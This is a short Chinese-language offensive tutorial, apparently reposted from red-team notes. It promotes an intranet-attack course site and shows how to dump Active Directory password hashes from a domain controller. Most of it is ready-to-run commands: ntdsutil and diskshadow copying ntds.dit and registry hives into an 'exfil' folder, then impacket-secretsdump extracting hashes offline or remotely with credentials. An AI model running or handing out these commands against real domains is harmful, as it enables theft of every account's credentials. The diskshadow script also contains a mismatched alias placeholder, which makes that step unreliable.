在本地和远程转储域控制器哈希

更多内网知识课前往无问社区查看http://www.wwlib.cn

无凭据 - ntdsutil

如果您没有凭据，但有权访问 DC，则可以使用 lolbin ntdsutil.exe转储 ntds.dit：

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

我们可以看到 ntds.dit 和 SYSTEM 以及 SECURITY 注册表配置单元正在转储到 c：\temp：

然后，我们可以使用 impacket 离线转储密码哈希：

root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

无凭证 - diskshadow

在 Windows Server 2008+ 上，我们可以使用 diskshadow 来获取 ntdis.dit。

创建一个 shadowdisk.exe 脚本，指示创建磁盘 C 的新卷影磁盘副本（在本例中为 ntds.dit 位于其中），并将其公开为驱动器 Z：\

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %someAlias% z:

现在执行以下命令：

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit

下面显示了 ntds.dit 被提取并放入我们的 c：\exfil 文件夹：

在交互式 diskshadow 实用程序中，清理影子卷：

diskshadow.exe> delete shadows volume trophy> reset

使用凭证

如果你拥有可以登录到 DC 的帐户的凭据，则可以通过 RPC 协议使用 impacket 远程转储 NTDS.dit 中的哈希：

impacket-secretsdump -just-dc-ntlm offense/administrator@10.0.0.6